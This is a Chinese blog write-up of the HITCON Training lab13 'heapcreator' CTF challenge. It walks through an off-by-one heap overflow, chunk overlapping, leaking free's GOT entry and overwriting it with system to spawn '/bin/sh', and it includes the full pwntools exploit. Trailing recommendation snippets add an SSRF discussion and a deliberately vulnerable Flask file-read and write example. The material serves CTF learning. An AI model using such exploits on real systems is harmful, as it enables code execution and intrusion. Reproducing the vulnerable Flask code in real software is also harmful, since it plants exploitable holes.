HITCON Trainging lab13 heapcreator

最新推荐文章于 2024-02-04 19:26:55 发布
原创 最新推荐文章于 2024-02-04 19:26:55 发布 · 1.1k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#堆溢出

本文详细解析了一次堆溢出攻击的过程,包括利用offbyone漏洞,通过chunkextend技术修改got表,最终实现system('/bin/sh')命令的执行。文章深入介绍了如何通过创建和编辑堆块来泄露和修改函数地址。

记录第一次不看任何writeup自己写出来的pwn题

前置知识:

off by one

chunk overlapping

chunk extend

一开始先看程序打开哪些保护机制

可以改got表,并且有点要注意是没开PIE,这样就不必泄露函数地址计算基址了(如果开了,这题堆上没有存放函数指针的,我也不会泄露。。)

然后分析程序,挖漏洞

首先从建堆函数看数据结构

结构分析清楚了,就找漏洞。首先我习惯看free函数O(∩_∩)O

可惜,指针已经清零了

再看看edit函数

根据数据结构,可以看到是向data中写入len_of_data+1长度的数据,因此存在off by one漏洞!!!

这里我选择溢出overlapping覆盖size,实现fastbin extend

 

思路如下:

1、我的目标是system('/bin/sh'),因此我需要修改某个函数的got表指向system。那就free吧。

2、那么我就要泄露出free_got中在内存中的真实地址。

3、通过修改某个ptr的指针,自然利用show(),打印出free_got地址。

4、怎么修改呢?就用上述所说的chunk extend技术,修改size,重新分配一个大Chunk,然后对后面的Prt肆意修改。

5、泄露之后,就直接利用edit改就行了。

6、最后就是free一个含有bin/sh的堆就行了。

 

看具体exp吧

第一步:泄露free_got

1

2

3

4

5

6

7

8

9

10

11

12

13

14

create(0x18,'aaaa')#0

create(0x10,'bbbb')#1

create(0x10,'cccc')#2

create(0x10,'/bin/sh')#3

edit(0,'a'*0x18+'\x81')#注意这个0x18

delete(1)

size = '\x08'.ljust(8,'\x00')

payload = 'd'*0x40+ size + p64(elf.got['free'])#这里的size涉及到后面修改地址时需要多长的字节

create(0x70,payload)#1

 

show(2)

cn.recvuntil('Content : ')

free_addr = u64(cn.recvuntil('Done')[:-5].ljust(8,'\x00'))

success('free_addr = '+str(hex(free_addr)))

首先必须要解释下为什么是0x18,这里涉及到chunk的知识。一个chunk在被free掉之后存在bins中,其头部含有prev_size和size没错,但一旦malloc后,这个prev_size就没用了,它只用来记录前一个空闲块的大小。因此如果我malloc0x18个字节的话多出8个字节没有对齐,会将这个prev_size也当做data段的部分分配出去,而不是下一个堆了!!!

然后呢,我要覆盖掉chunk1和chunk2的话根据结构体,我需要create 0x70个字节,加上头部就是0x81了,注意in_use位!然后计算距离chunk2的size字段需要多少数据,填充就行

这是create完四个chunk后的正常的堆的分布

这是edit(0)之后的堆分布,可以看到size位已经被该为0x81了

现在再看,已经成功将chunk2的Ptr改为free_got了

此时free_got的正常地址为0x7efc15fe44f0

能够正常泄露

第二步:修改free_got

1

2

3

4

system_addr = free_addr + lib.symbols['system']-lib.symbols['free']

success('system_addr = '+str(hex(system_addr)))

 

edit(2,p64(system_addr))

首先要计算system_addr的地址,通过libc两个函数之间的相对偏移固定的原理,利用已经泄露的free_addr得到system_addr

由于此时chunk2的ptr已经修改为free_got了,编辑chunk2就相当于改free_got了

修改后再看,发现成功篡改free_got了,如无意外就能成功了。

最后一步:

1

2

delete(3)

cn.interactive()

 

下面贴出完整exp

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

#!/usr/bin/env python

from pwn import *

#cn = remote('127.0.0.1',9527)

cn = process('./heapcreator')

elf=ELF('./heapcreator')

#context.log_level='debug'

lib = ELF('libc.so.6')

 

def create(l,value):

    cn.recvuntil('Your choice :')

    cn.sendline('1')

    cn.recvuntil('Size of Heap : ')

    cn.sendline(str(int(l)))

    cn.recvuntil('Content of heap:')

    cn.sendline(value)

 

def edit(index,value):

    cn.recvuntil('Your choice :')

    cn.sendline('2')

    cn.recvuntil('Index :')

    #if index == 2:gdb.attach(cn)

    cn.sendline(str(index))

    cn.recvuntil('Content of heap : ')

    cn.sendline(value)

def show(index):

    cn.recvuntil('Your choice :')

    gdb.attach(cn)

    cn.sendline('3')

    cn.recvuntil('Index :')

    cn.sendline(str(index))

def delete(index):

    cn.recvuntil('Your choice :')

    cn.sendline('4')

    cn.recvuntil('Index :')

    cn.sendline(str(index))

#leak free addr

create(0x18,'aaaa')#0

create(0x10,'bbbb')#1

create(0x10,'cccc')#2

create(0x10,'/bin/sh')#3

gdb.attach(cn)

edit(0,'a'*0x18+'\x81')

gdb.attach(cn)

delete(1)

size = '\x08'.ljust(8,'\x00')

payload = 'd'*0x40+ size + p64(elf.got['free'])

create(0x70,payload)#1

 

show(2)

cn.recvuntil('Content : ')

free_addr = u64(cn.recvuntil('Done')[:-5].ljust(8,'\x00'))

success('free_addr = '+str(hex(free_addr)))

#trim free_got

system_addr = free_addr + lib.symbols['system']-lib.symbols['free']

success('system_addr = '+str(hex(system_addr)))

#gdb.attach(cn)

edit(2,p64(system_addr))

#gdb.attach(cn)

show(2)

delete(3)

cn.interactive()

欢饮大家交流讨论,给我指出问题。。

堆溢出 HITCON Trainging lab13
winterze的博客
04-14 325
chunk-extend学习,一个友好的题目,下载地址 0x00 程序分析 基本信息 [*] '/home/ububtu/ctf/pwn/heapcreator' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE:...
HITCON-Training lab13 heapcreator(heap extend)
像初雪一样自由洒落
04-16 1204
啊啊啊,搞了一早上,终于终于搞明白了,,, 题目链接:https://buuoj.cn/challenges#hitcontraining_heapcreator ida简单看一下 创建堆 编辑 对比建堆,可以看到size大了一个 打印 删除 程序基本功能就这样了 因为edit的时候可以多写入一个字节,存在off-by-one,我们可...
buuctf hitcontraining_heapcreator HITCON Trainging lab13
weixin_45677731的博客
08-10 1167
这一题在wiki上面是有的,在Chunk Extend and Overlapping里面,个人觉得这一题对于我这种刚开始学习堆的人来说,是比较容易理解的一题 拖进IDA create_heap函数: 值得注意的是,他这里是会有两次malloc的,也就是说,你申请了一次,他就会创建两个chunk,第一个chunk是0x20大小的,可以看作是记录的作用,里面存放着第二个chunk的size和指针,同时,第一个chunk的地址指针保存在bss段中,heaparray数组这里: 这样表述起来可能不太清晰,我申
HITCON Trainging lab13——heapcreator
04-19 315
64位程序,没开PIE   #chunkoverlapping #off by one 程序逻辑 1 int __cdecl main(int argc, const char **argv, const char **envp) 2 { 3 char *v3; // rsi 4 const char *v4; // rdi 5 char...
Chunk Extend and Overlapping(HITCON Trainging lab13)
九层台
08-13 680
数据结构 unsigned __int64 create_heap() { _QWORD *v0; // rbx signed int i; // [rsp+4h] [rbp-2Ch] size_t size; // [rsp+8h] [rbp-28h] char buf; // [rsp+10h] [rbp-20h] unsigned __int64 v5; // [r...
HITCON Trainging lab13——CTFwiki
qq_53928256的博客
08-22 1314
通过off by one溢出修改next chunk的size域来实现overlap,修改指针实现执行system函数,获得系统权限
HITCON Trainging lab13 - heapcreator WP
weixin_55013445的博客
02-04 1155
主要知识点:extend&overlapping off-by-one环境:ubuntu-16.04 glibc2.23。
【PWN · heap | Overlap | off-by-one】HITCON Trainging lab13
Mr_Fmnwon的博客
11-04 366
通过overlap可以造成堆的重叠,进而通过堆的修改、访问等操作,劫持或泄露另一个堆的信息,如果堆上存在指针,而存在对指针的读写,就可以控制修改该指针,进行任意地址读/写。
pwn HITCON Trainging lab13
doudoudedi
10-09 291
emem其实我的结构体学的不太好 结构体大概为这样: struct { char *heaparray[i]; char conten[20] } edit heaparray->content 编辑的地方存在一个off by one的漏洞我们可以修改下一个chunk的大小然后释放申请该大小的chunk造成堆溢出~~ 简单点说就是先创建三个堆块在第一个堆块写入’/bin/s...
hitcontraning_lab13_writeup
【xiaoxiaorenwu's blog】
04-07 307
依然是wiki上的例题,先提供二进制源码:hitcontraning_lab13 预览: 文件是64位,partial relro则可以改写got表,感觉就像是堆题(名字也叫heapcreator)。。。没有pie调试起来会方便很多。。。然后放进ida64看一下大致功能。 前言分析: 首先有两个setvbuf()设置好了标准输入和标准输出的缓冲区,所以程序不会在heap段设置chunk,然后打...
HITCON Trainging lab13 学习Chunk Extend and Overlapping 攻击
qq_36495104的博客
05-08 333
查看保护措施,RelRO为Partial,即可以修改GOT表项 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-znarZnkX-1588937420199)(F:\wangpei\笔记\pwn\note\assets\1588837137968.png)] 这个题目,定义了一种heap结构体,大概如下 struct heap { size; #heap的大小;8字节 content; #指针,指向content;8字节 } 下面是main函数,定义了菜单选
hitcontraining_heapcreator
z1r0的博客
12-24 530
hitcontraining_heapcreator 查看保护 edit有个off-by-one,overlapping将堆块重叠,把got给申请到chunk的heaparray指针那里,再次修改时则修改的是got。 具体的overlapping看z1r0’s blog from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug:
BUUCTF--hitcontraining_heapcreator1
qq_30528603的博客
01-05 620
此时往chunk3这个用户堆写数据,将会写入free_got表里,这样我们可以将伪造的system的地址写入free_got表,一旦调用free,将会去执行system。2.接着修改chunk0的内容填入bin/sh作为后续system的参数,利用off-by-one并修改下一个索引chunk的大小为0x81(覆盖的是chunk1的索引堆)。这句其实可以这样解读read(0,对应索引堆里的那个堆地址,Size),现在他将变成这样read(0,&free_got,Size)。以此来达到我们的目的。
[off by one] hitcontraining_heapcreator
huzai9527的博客
04-01 563
[off by one] hitcontraining_heapcreator 本题主要看懂,edit中的off by one, 知道off by one 还需要知道程序的大概结构体 从内存情况推测结构体 每次申请空间,会创建2个chunk,其中一个固定为下面结构体形式,另一个根据大小分配 struct test{ int size; char *content; } exp from pwn import * #p = remote('node3.buuoj.cn',27554) p
[BUUCTF]-PWN:hitcontraining_heapcreator解析(off by one)
2301_79326813的博客
01-17 783
又是一道堆题,先看一下保护Partial RELRO说明got表可被修改,而且还没开pie,直接看ida这里就不过多解释了,把比较重要的说一下。首先是这个edit,它限制了填充字节,只能比我们申请的大小多1个字节。还有创建堆块的函数,他在创建我们申请的堆块前还申请了一个大小为0x10的堆块。在动态调试中可以发现,这个堆块还存储了与填充字节数有关的字节数,而且还和heaparray一样存储了指向与他一同创建的堆块的指针。
【pwn】 hitcontrain_bamboobox && ZJCTF_19_EasyHeap
Nothing
03-06 616
这两个题目类似,放在一起写。 例行检查 没有pie,got表可写。 程序逻辑 edit功能都存在堆溢出,堆指针都保存在bss段上,可以通过unlink对got表进行读写。本来两个程序都存在后门,但是oj在部署的时候路径有点问题,所以就想办法获取shell。 bamboobox存在show功能,可以泄露libc地址。 easyheap刚好程序中存在system函数。 bamboobox from ...
heapcreater和off by one
m0_62326489的博客
07-20 114
hhh
Chunk Extend/Overlapping | 堆拓展、重叠
SkYe's Blog
08-06 2356
堆拓展&溢出 绝大部分内容来自 CTF-WIKI ,内容引用用于学习记录 介绍 chunk extend 是堆漏洞的一种常见利用手法,通过 extend 可以实现 chunk overlapping 的效果。这种利用方法需要以下的时机和条件: 程序中存在基于堆的漏洞 漏洞可以控制 chunk header 中的数据 原理 chunk extend 技术能够产生的原因在于 ptmalloc 在对堆 chunk 进行操作时使用的各种宏。 在 ptmalloc 中,获取 chunk 块大小的操作如
[HITCON 2017]SSRFme 1
最新发布
03-30
### HITCON 2017 SSRF Challenge Overview The **HITCON 2017 CTF** featured a variety of challenges, including those related to Server-Side Request Forgery (SSRF). These challenges were designed to test participants' understanding of web application vulnerabilities and their ability to exploit them effectively. One notable challenge was the **SSRFme task**, which involved exploiting an SSRF vulnerability within a PHP-based system. The provided code snippet demonstrates how the `$_SERVER['HTTP_X_FORWARDED_FOR']` variable is manipulated by splitting its value using commas as delimiters[^5]. This manipulation allows attackers to control the `$http_x_headers[0]` value, potentially leading to unauthorized access or command execution scenarios. In another instance, contestants had to leverage file-writing capabilities through GET requests combined with filename parameters[^4]. By carefully crafting filenames that included shell commands such as `/readflag`, they could execute arbitrary commands on the server side. Specifically: - A request like `/?url=/&filename=aaa` would create a new file named after the specified parameter. - Subsequent exploitation steps allowed reading sensitive files from restricted directories via crafted URLs incorporating malicious payloads into both query strings (`?`) and headers. Additionally, there exists documentation regarding similar exercises where users reconstruct past competitions’ problems locally for practice purposes—such efforts often involve setting up Docker containers mimicking original environments accurately so learners may gain hands-on experience without needing direct participation during actual events themselves[^1]. For further exploration beyond just theoretical knowledge about these types of attacks but also practical implementations thereof consider reviewing additional resources discussing advanced techniques surrounding path traversal exploits alongside other common injection vectors present throughout modern-day applications today too! ```python import os from flask import Flask, request app = Flask(__name__) @app.route('/') def index(): url = request.args.get('url', '') filename = request.args.get('filename', 'default.txt') try: response = open(url) # Vulnerable line due to lack of validation content = response.read() with open(f"/tmp/{filename}", "w") as f: f.write(content) return f"Content written successfully to {filename}" except Exception as e: return str(e), 400 if __name__ == '__main__': app.run(debug=True) ```
评论 3
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值